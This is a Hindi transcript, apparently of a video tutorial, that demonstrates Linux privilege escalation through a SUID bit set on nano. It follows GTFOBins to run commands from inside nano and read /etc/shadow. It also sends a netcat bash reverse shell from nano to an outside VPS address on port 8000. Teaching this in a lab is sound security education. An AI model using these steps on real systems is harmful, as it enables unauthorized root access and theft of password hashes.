अस्सलाम वालेकुम एवरीवन, दिस इज मुस्तफ़ा खान। आज की वीडियो में हम बात करने वाले हैं प्रिविलेज एस्केलेशन की। हम ऑलरेडी प्रिविलेज एस्केलेशन की बात कर चुके हैं क्रॉन जॉब में कि हम किस तरह क्रॉन जॉब के थ्रू प्रिविलेज एस्केलेट करवा सकते हैं। आज की वीडियो में हम बात करने वाले हैं SUID बिट की कि अगर किसी ऐसी बाइनरी के ऊपर जो बाइनरी सिस्टम कमांड एग्जीक्यूट कर सकती है वहाँ SUID बिट सेट हो तो हम अपने प्रिविलेज को किस तरह एस्केलेट करवा सकते हैं, इसकी बात हम आज की वीडियो में करने वाले हैं। तो चलिए स्टार्ट करते हैं। आज की वीडियो की डेमोन्स्ट्रेशन में हम बात करने वाले हैं नैनो बाइनरी की। नैनो टेक्स्ट एडिटर है जो कि ज्यादातर आपको लिनक्स के तमाम डिस्ट्रॉज के अंदर मिल जाता है। नैनो के अंदर सिस्टम कमांड एग्जीक्यूट करने का फीचर अवेलेबल है। हम आज की वीडियो में फॉलो करने वाले हैं GTFO बिन की ये गाइडलाइन, जिसके थ्रू हम नैनो के थ्रू सिस्टम कमांड को एग्जीक्यूट करवा सकते हैं। सबसे पहले हम देखेंगे बगैर SUID बिट सेट किए कि नैनो के थ्रू अगर हम अपनी कमांड को एग्जीक्यूट करते हैं तो उसका आउटपुट क्या आता है। देन हम यहाँ पर एक स्पेशल परमिशन असाइन करेंगे जिसको हम SUID बिट कहते हैं। एंड देन हम चेक करेंगे कि अब हमारी कमांड जो एग्जीक्यूट हो रही है उसमें क्या फर्क है। एंड इस दौरान हम डिस्कस कर लेंगे मेजर प्रिविलेज एस्केलेशन की बात। ओके, सबसे पहले बात कर लेते हैं नैनो की कि हमने यहाँ पे नैनो को और नैनो की परमिशन देख लेते हैं। यूजर बिन नैनो, ठीक है। अब ये बाय डिफॉल्ट जो परमिशन नैनो सेट होती है वो यही परमिशन है। अब तक यहाँ पर कोई चेंजेस नहीं की गई। अगर मैं डिफॉल्ट परमिशन के साथ नैनो के यहाँ पर एग्जीक्यूट कर रहा हूँ तो कुछ इस तरह का आउटपुट आ जाता है मेरे सामने। और अब अगर आके मैं GTFO बिन की गाइडलाइन को फॉलो करूँ शेल के लिए तो मुझे कुछ इस तरह की कमांड एग्जीक्यूट करवानी है। Ctrl+R एंड Ctrl+X, यहाँ पे चलते हैं। देन टाइप Ctrl+R एंड देन Ctrl+X। Ctrl+X टाइप करेंगे तो कमांड टू एग्जीक्यूट का यहाँ पे ऑप्शन आ जाएगा। एंड देन आपने यहाँ पे टाइप करना है who am I, और यहाँ पे जो भी आपका who am I का आउटपुट है वो डिस्प्ले हो जाएगा नैनो के एडिटर के अंदर। अब यही काम दोबारा करवाते हैं। हमने कहा Ctrl+R एंड Ctrl+X। अब यहाँ पर हम ट्राई करते हैं etc शेडो फाइल को रीड करने की, जो कि एक रिस्ट्रिक्टेड फाइल है। उसके लिए आपके पास परमिशन ज्यादा होनी चाहिए। जैसे रूट यूजर है जो कि etc शेडो फाइल को रीड करवा सकता है, खाली बाय डिफॉल्ट इतनी परमिशन नहीं रखता कि वो शेडो फाइल को रीड करवा सके। लेट्स से शेडो, ठीक है, परमिशन डिनाइड। अब ये दो कमांड हमने करंटली एग्जीक्यूट करवाई नॉर्मल डिफॉल्ट परमिशन के साथ, जो कि डिफॉल्ट काली के अंदर आती है। अब यही काम करवाएंगे हम SUID बिट सेट करने के बाद। अगर हम यहाँ पर एक स्पेशल परमिशन असाइन करते हैं नैनो पर, SUID बिट असाइन करते हैं, तो क्या हम यहाँ पर अपने प्रिविलेज को एस्केलेट कर सकते हैं या नहीं कर सकते, देख लेते हैं। सबसे पहले चलते हैं रूट यूजर की तरफ। Who am I, अब करंटली हमारा जो यूजर है वो है रूट। और दोबारा कंफर्म कर लेते हैं यूजर बिन के साथ, यूजर बिन एंड देन नैनो। अब करंटली यहाँ पर कोई स्पेशल परमिशन असाइन नहीं है। अब परमिशन असाइन कर लेते हैं, चेंज मोड एंड यूजर प्लस की परमिशन देते हैं एस फॉर SUID विद बाइनरी। एंड यहाँ पर हम कह देंगे यूजर बिन नैनो। देन हम दोबारा कंफर्म कर लेंगे क्या यहाँ पर कोई स्पेशल परमिशन सेट हुई है। ठीक है, यहाँ पर एक स्पेशल परमिशन सेट हो चुकी है। अब यहाँ पर एक चीज नोट करने वाली है कि एक और बिट यहाँ पे सेट हो गई है विच इज एस इस बात की इंडिकेशन है कि यहाँ पर SUID बिट सेट हुई भी है इस फाइल की तरफ, ठीक है। और फाइल ऑनर जो है रूट है। और लिनक्स के अंदर दो चीजों को ज्यादा फोकस करना चाहिए, एक है फाइल यूजर और एक है फाइल ऑनर। करंटली जब हम बात कर रहे हैं SUID बिट की तो हम बात करेंगे फाइल ऑनर की। कि अब अगर करंट यूजर जो है हमारा हु एम आई करके देखे थे काली, अब अगर काली नैनो फाइल को एग्जीक्यूट करवाएगा तो वो एक्चुअल के अंदर फाइल ऑनर की परमिशन के साथ एग्जीक्यूट होगी, ना कि फाइल यूजर की परमिशन के साथ, ठीक है। ये यूजर है और ये फाइल ऑनर है। ये नैनो की फाइल का ऑनर रूट है। SUID बिट की वजह से लो प्रिविलेज यूजर हाई प्रिविलेज यूजर के कमांड को भी एग्जीक्यूट करवा सकता है विद द हेल्प ऑफ SUID बिट। यही अब हम देखने वाले हैं। आप सबसे पहले देख लेते हैं कि यहाँ पर अगर लिनक्स के अंदर हम फाइंड करवाना चाह रहे हैं कि कौन कौन सी फाइल हैं जहाँ पर SUID बिट सेट हुई भी है, तो वो हम किस तरह देख सकते हैं। लेट्स से फाइंड एंड हम कह रहे हैं कि यूजर, बल्कि यही काम करवा लेते हैं। फाइंड और बेस डायरेक्टली प्रोवाइड करते हैं कि सिस्टम बाइट में जाके चेक करो यहाँ पर कौन कौन सी फाइल्स रखी हुई हैं जहाँ पर यूजर की जो परमिशन है वो SUID बिट सेट हुई भी है, ठीक। एंड देन हम यहाँ पर फाइल टाइप करवा लेते हैं डैश टाइप
टाइप हम क्या देखना चाह रहे हैं, फाइल, हम यहाँ पे कोई डायरेक्टरी नहीं देखना चाह रहे हैं, हम फाइल सर्च करवाना चाह रहे हैं। एंड देन टू, और यहाँ पे जो भी हमें एरर मिलेगा रिडायरेक्ट करवा देंगे उसको हम नल की तरफ, कि भाई इसको डिस्कार्ड कर दो, एरर हमारे किसी काम के नहीं है। एंड देन इंटर। ओके, फिलहाल के लिए हम बंद करवा लेते हैं। अब यहाँ पे जो जो फाइल्स हैं, इन तमाम फाइल्स पर SUID बिट की परमिशन सेट हुई हुई है। अब अगर इनमें से कोई ऐसी फाइल है जहां पर, या कोई ऐसी बाइनरी है जो कि सिस्टम की कमांड को एग्जीक्यूट करवा सकती है, तो वो हमारे काम की है। और मोस्ट ऑफ द टाइम यहाँ पे आपका काम हो जाता है। अब इस केस में हम जानते हैं कि नैनो की जो यूटिलिटी है, उसके थ्रू हम सिस्टम की कमांड को एग्जीक्यूट करवा सकते हैं, और इस नैनो की यूटिलिटी पर SUID बिट भी सेट हुई है। तो अब हमारे लिए एक विन विन सिचुएशन है, अब जो कि हम कंफर्म कर सकते हैं कि यहाँ पर नैनो जो कि रेड कलर शो कर रहा है, एंड यहाँ पर SUID बिट सेट हुई है। अब अगर हम यहाँ पे जाएं और नैनो टाइप करें विदाउट सूडो कमांड, ठीक है, नॉर्मली आप देखते हैं कि आप कुछ जगहों पे सूडो टाइप करते हैं, देन जाके आप कोई फाइल एग्जीक्यूट करते हैं तो वो सुपर यूजर की प्रिविलेज के साथ एग्जीक्यूट होती है। करंटली हमें सूडो की जरूरत नहीं है, आप डायरेक्टली जाके नैनो टाइप करें, इंटर करें, एंड देन आप इस गाइडलाइन को फॉलो कर लेंगे, आप किस तरह कमांड एग्जीक्यूट करवा सकते हैं नैनो की, जो कि आप कंट्रोल R टाइप करें, देन कंट्रोल X टाइप करें, देन यहाँ पर एक ऑप्शन आ जाएगा कमांड टू एग्जीक्यूट। अब हम यहाँ पे टाइप करें हु एम आई, तो यहाँ पर हम देख सकते हैं कि करंट यूजर जो है वो रूट दिखा रहा है। मतलब अब जो नैनो के अंदर हम जाके सिस्टम की कमांड एग्जीक्यूट कर रहे हैं विद द हेल्प ऑफ SUID बिट, वो हमें सिस्टम की कमांड को ही एग्जीक्यूट करने दे रहा है विद रूट परमिशन, जो कि हमने अभी कंट्रोल R कंट्रोल X के थ्रू हु एम आई करके देख लिया, ठीक है। अब लास्ट टाइम हमने जब हम विदाउट SUID बिट सेट किए देख रहे थे कि यहाँ पे क्या हमें आउटपुट मिलता है हु एम आई का, तब हमें यहाँ पे आउटपुट मिल रहा था काली का। हु एम आई का जो आउटपुट था वो था काली, अब ये रूट। और सेकंड कमांड जो हमने एग्जीक्यूट की थी which was I think cat etc shadow file, कंट्रोल R एंड कंट्रोल X। अब हम यही काम करवा के देख लेते हैं कि etc shadow file हम रीड करके देख लेते हैं। लास्ट टाइम जब हमने कमांड एग्जीक्यूट की थी तो हमें परमिशन डिनाइड का एरर मिल गया था कि परमिशन डिनाइड है, आपके पास इनफ परमिशन नहीं है etc shadow file को रीड करने की। लेट्स सी, अब हम अपनी फाइल की जो भी परमिशन है या कोई भी फाइल सिस्टम की रीड करवा सकते हैं विद द हेल्प ऑफ SUID बिट, ठीक है, क्योंकि अब हमारे पास जो परमिशन है नैनो की वजह से वो है रूट परमिशन। अब एक बार ट्राई कर लेते हैं एक प्रॉपर शेल की, कि हम किस तरह एक प्रॉपर शेल ले सकते हैं, और GTA फॉर विंस की गाइडलाइन को फॉलो करते हुए इसको साइड बाय साइड ओपन कर लेते हैं, एंड नाउ वी आर गुड टू गो। कंट्रोल R एंड द कंट्रोल X। अब अगर हम कमांड यहाँ पर पेस्ट करवाएं तो क्या हम एक प्रॉपर शेल ले सकते हैं काली या फिर रूट का। लेट्स से एग्जीक्यूटिंग एंड क्लियर करवा के देख लेते हैं OMI। अब हमारे पास जो शेल आया है वो आया है काली का। हम जो एक्सपेक्ट कर रहे थे वो शेल था रूट यूजर का, कि हमारे पास रूट यूजर का शेल आ जाएगा, देन हम तमाम एक्टिविटीज को परफॉर्म करवा सकते हैं। बट करंटली ऐसा नहीं हुआ। आप एक बार देख लेते हैं कि इसके पॉसिबल रीजन क्या है, ठीक है। एक बार दोबारा नैनो टाइप करते हैं, दोबारा कंट्रोल R कंट्रोल X करवाते हैं, हमने कहा हु एम आई, आउटपुट हमें मिल रहा है, हमने कहा कंट्रोल R एंड कंट्रोल X, हम कह रहे हैं कि etc शेडो। अब हम शेडो की फाइल को भी यहाँ पर रेड कर पा रहे हैं, ठीक है, क्योंकि फाइल परमिशंस जो है वो रूट के ही यहाँ पे इस्तेमाल हो रहे हैं। बट द प्रॉब्लम इज कि करंटली जो हम कमांड एग्जीक्यूट करवा रहे हैं वो हम SUID बिट के थ्रू करवा रहे हैं, और वो हम करवा रहे हैं नैनो के ऊपर। करंट जो यूजर हमारा है वो है काली, मतलब कि हम अभी नैनो को एग्जीक्यूट करवा रहे हैं काली यूजर के साथ, और फाइल ऑनर की जो परमिशन करंटली यूज हो रही है वो है रूट। अब ये रूट जो फाइल ऑनर की परमिशन है वो पर्टिकुलरली या स्पेसिफिकली इस यूटिलिटी के तौर पे इस्तेमाल हो रही है। इस यूटिलिटी पर ही ये हम कमांड एग्जीक्यूट करवा सकते हैं। अगर हम नैनो के थ्रू कोई और बाइनरी एग्जीक्यूट करवाना चाहें जहां पर हम रूट की कमांड को एग्जीक्यूट करवाना चाहें तो ये चीज काम नहीं करेगी। उसके लिए आपके पास सूडो के परमिशन होने चाहिए, सूडो की कोई मिसकॉन्फ़िगरेशन यहाँ पर एग्जिस्ट करना लाजमी है। अब अगर यही चीज मैं आपको दिखाऊं बैक कनेक्ट करवाने के लिए, कि बैक कनेक्ट अगर हम इस सिचुएशन में करवाते हैं जहां पर सिर्फ और सिर्फ SUID की बिट परमिशन या SUID बिट सेट हुई है, तो क्या हमें बैक कनेक्ट मिलेगा। बैक कनेक्ट अगर मिलेगा तो क्या रूट परमिशन होंगे या नहीं होंगे। लेट्स से टर्मिनल ओपन करवा लेते हैं एक बार, और इसको एक बार साइड बाय साइड ओपन कर लेते हैं। हम कर रहे हैं SSH और VPS से लॉगिन कर लेते हैं, ठीक है। अब हम कह रहे हैं
netcat-lvp एंड 8000 पोर्ट आ गया। चलते हैं नैनो की तरफ, दोबारा से एक बार कंफर्म कर लेते हैं कि हाँ अभी भी हम SUID बिट सेट है नैनो पे, और यहाँ पे हम देख सकते हैं नैनो, और यहाँ पे अब चलते हैं कंट्रोल R एंड कंट्रोल X। अब जो यहाँ पे हमने कमांड एग्जीक्यूट की थी वो उसका आउटपुट आ रहा था हुमैक का रूट, विच मीन की कमांड जो एग्जीक्यूट हो रही है वो रूट हो रही है। इस चीज को हमने क्रॉस चेक किया था शेडो फाइल रीड करके। अब यहाँ पे हम शेडो फाइल भी रीड कर सकते हैं, तो मतलब देयर इज नो डाउट कि यहाँ पे परमिशंस का फिलहाल कोई इशू नहीं है। लेकिन अब अगर मैं यही काम कर रहा हूँ नेटकैट के साथ कि हमने कहा नेटकैट एग्जीक्यूट करवाओ, नेटकैट को कनेक्ट करवाना है हमने इस आईपी पे 178.156 पोर्ट 8000 एंड इन्वोक करवा देते हैं बैश का शेल। अब जैसे ही यहाँ पे बैश का शेल इन्वोक होगा, बैक कनेक्ट मिलेगा, वो यहाँ पर शो हो जाएगा। लेट्स कंफर्म। ठीक है, एक हिट आ गया। अब हमने कहा हु एम आई। अब जो हमें आउटपुट मिल रहा है वो है कालिका। इसका पॉसिबल रीजन क्या हो सकता है? इसका पॉसिबल रीजन ये है कि जो हम नैनो को इस्तेमाल कर रहे हैं, नैनो की फाइल ऑनर की जो परमिशन है वो तो रूट है, जो कि हम नैनो को एग्जीक्यूट करवा रहे हैं, लेकिन हम नैनो के थ्रू ncat को एग्जीक्यूट नहीं करवा सकते रूट परमिशन के साथ। ठीक है, यहाँ पे फाइल परमिशन की कुछ चीजें जो कि इंशाल्लाह हम अपनी नेक्स्ट वीडियो में बात करेंगे, और फिलहाल के लिए इतना ही। अब एक चीज और कंफर्म कर लेते हैं कि अगर इस सेम यूटिलिटी को हम नैनो को सूडो के साथ कम एग्जीक्यूट करवाएंगे और फिर हम अपनी बैक कनेक्ट करवाने की कोशिश करते हैं, लेट्स से कंट्रोल R एंड कंट्रोल X, हमने कहा netcat 178.128.156 8000 एंड इन्वोक करवा लेते हैं बैश का शेल, हिट एंटर। लेट्स कंफर्म हु एम आई। अब यहाँ पे जो हमें शेल मिला है वो है रूट। तो यहाँ पर जो फाइल ऑनर की परमिशन का एक कॉन्फ्लिक्ट है, जो कि शायद अभी आपको समझने में थोड़ी सी प्रॉब्लम हो रही हो। जब हम फाइल परमिशन की बात करेंगे तब इंशाल्लाह इस टॉपिक को बहुत इन डेप्थ जाके क्लियर कर लेंगे। आज की वीडियो के लिए इतना ही। अपना ख्याल रखिएगा। कोई और क्वेरी हो तो मुझे कमेंट सेक्शन में जरूर बताइएगा। मिलते हैं अगली वीडियो में। थैंक यू। अल्लाह हाफ़िज़।